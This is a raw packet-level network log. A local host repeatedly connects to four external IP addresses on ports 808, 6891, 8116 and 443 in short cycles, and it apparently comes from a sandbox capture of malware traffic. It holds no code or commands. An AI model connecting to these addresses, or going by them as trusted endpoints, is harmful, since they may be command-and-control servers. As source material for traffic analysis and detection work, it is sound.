Oct 28, 2021 05:11:15.292156935 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.293359041 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.306446075 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.541333914 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.699318886 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.699495077 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.699592113 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.700320959 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.700437069 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.858091116 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.858110905 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.858118057 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.858149052 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:16.235548019 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:16.247450113 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:16.247478008 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:16.247606993 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:16.247657061 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:16.251756907 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:16.401156902 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:16.401407957 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:16.402046919 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:16.409663916 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:16.567358017 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:16.568283081 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:16.568458080 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:16.886558056 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.052285910 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.052531004 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.053345919 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.053488970 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.218718052 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.218756914 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.273768902 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.440171003 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.440401077 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.441102982 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.599638939 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.599673986 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.599752903 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.599802017 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.605638981 CEST	49748	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.607347965 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.608407974 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.608483076 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.616661072 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.771014929 CEST	6891	49748	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.783323050 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.783557892 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.784146070 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.784240961 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:17.950577021 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:17.950594902 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:18.326376915 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:18.326411963 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:18.327704906 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:18.330933094 CEST	49749	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:18.497199059 CEST	6891	49749	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:18.767951965 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.814495087 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:18.814680099 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.815478086 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.861772060 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:18.875168085 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:18.875193119 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:18.875355005 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.883385897 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.930780888 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:18.930896997 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.931647062 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.931788921 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:18.978158951 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.147392988 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.147413969 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.147569895 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.147627115 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.156249046 CEST	49750	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.202617884 CEST	8116	49750	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.408871889 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.460975885 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.461129904 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.461724043 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.514832973 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.523885965 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.523910046 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.524071932 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.530946016 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.583566904 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.583662987 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.584410906 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.584525108 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.636298895 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.636950016 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.822627068 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.822675943 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:19.822851896 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.827568054 CEST	49751	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:19.879492998 CEST	8116	49751	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:20.169284105 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.169337988 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.169544935 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.170461893 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.170485973 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.655191898 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.655431032 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.655986071 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.656002045 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.665563107 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.665585995 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.665659904 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.665669918 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.846720934 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.846759081 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:20.846923113 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.848649025 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:20.848669052 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.350579977 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.350657940 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.350899935 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.362859964 CEST	49752	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.362899065 CEST	443	49752	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.371359110 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.371442080 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.372360945 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.372365952 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.378191948 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.378200054 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:21.378325939 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:21.378336906 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:22.087688923 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:22.087770939 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:22.087940931 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:22.091459990 CEST	49753	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:22.091489077 CEST	443	49753	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:22.402544975 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.561140060 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.561284065 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.562120914 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.720555067 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.720659971 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.720865011 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.721373081 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.726403952 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.726557016 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:22.879812956 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.884829998 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.884872913 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.884884119 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.884895086 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:22.884906054 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.140373945 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.272716045 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.272741079 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.272842884 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.280060053 CEST	49754	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.305226088 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.305419922 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.305969000 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.438468933 CEST	808	49754	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.470643044 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.470767021 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.470824003 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.471373081 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.477333069 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.477447033 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:23.636132002 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.641961098 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.642009020 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:23.642024040 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:24.030323982 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:24.030349016 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:24.030620098 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:24.036494970 CEST	49755	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:24.201292038 CEST	808	49755	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:24.294409037 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.459815979 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:24.460042953 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.460768938 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.625876904 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:24.625976086 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:24.626068115 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.626526117 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.630070925 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.630167007 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:24.795222044 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:24.795239925 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.062876940 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.171367884 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.171387911 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.172513962 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.172533989 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.181643963 CEST	49756	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.228256941 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.228483915 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.229280949 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.346868992 CEST	6891	49756	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.394506931 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.394726038 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.394897938 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.395355940 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.399168015 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.399374962 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.564719915 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.564764977 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.564791918 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.948322058 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.948348045 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:25.948465109 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:25.950695992 CEST	49757	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:26.116132975 CEST	6891	49757	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:26.203430891 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.252737045 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.252861977 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.253380060 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.303035975 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.303059101 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.304769993 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.305196047 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.308685064 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.308800936 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.357719898 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.357737064 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.358469009 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.550117970 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.550144911 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.550250053 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.557888031 CEST	49758	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:26.607054949 CEST	8116	49758	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:26.974942923 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.027038097 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.027316093 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.028148890 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.079837084 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.079968929 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.080087900 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.080810070 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.086785078 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.086916924 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.138617992 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.138757944 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.308866024 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.308882952 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.309031010 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.312154055 CEST	49759	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:27.363811016 CEST	8116	49759	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:27.590936899 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:27.590984106 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:27.591101885 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:27.591722012 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:27.591733932 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.112095118 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.115322113 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.115999937 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.116010904 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.134614944 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.134630919 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.134881020 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.134891987 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.327476025 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.327524900 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.327635050 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.328274965 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.328288078 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.813539982 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.813724995 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.814372063 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.814393044 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.820533037 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.820554972 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.820681095 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.820696115 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.844471931 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.844533920 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:28.844583988 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.844614983 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.851567984 CEST	49760	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:28.851603031 CEST	443	49760	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:29.510418892 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:29.510508060 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:29.510627031 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:29.513251066 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:29.538393021 CEST	49761	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:29.538427114 CEST	443	49761	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:29.873935938 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.034009933 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.034094095 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.039880991 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.199757099 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.199795961 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.199911118 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.203900099 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.207278967 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.207389116 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.363689899 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.367050886 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.367074966 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.367096901 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.367137909 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.745985031 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.746009111 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.749042034 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.822137117 CEST	49762	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.831995964 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.982140064 CEST	808	49762	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.995665073 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:30.997535944 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:30.998708010 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.162288904 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.162333965 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.162528992 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.163078070 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.168313026 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.168412924 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.326539040 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.331933022 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.331960917 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.331973076 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.331984043 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.331994057 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.715415001 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.715461969 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:31.715559006 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:31.715581894 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:32.468349934 CEST	49763	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:32.478149891 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.632013083 CEST	808	49763	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:32.644570112 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:32.644665003 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.645555973 CEST	49764	6891	192.168.2.3	45.77.0.96
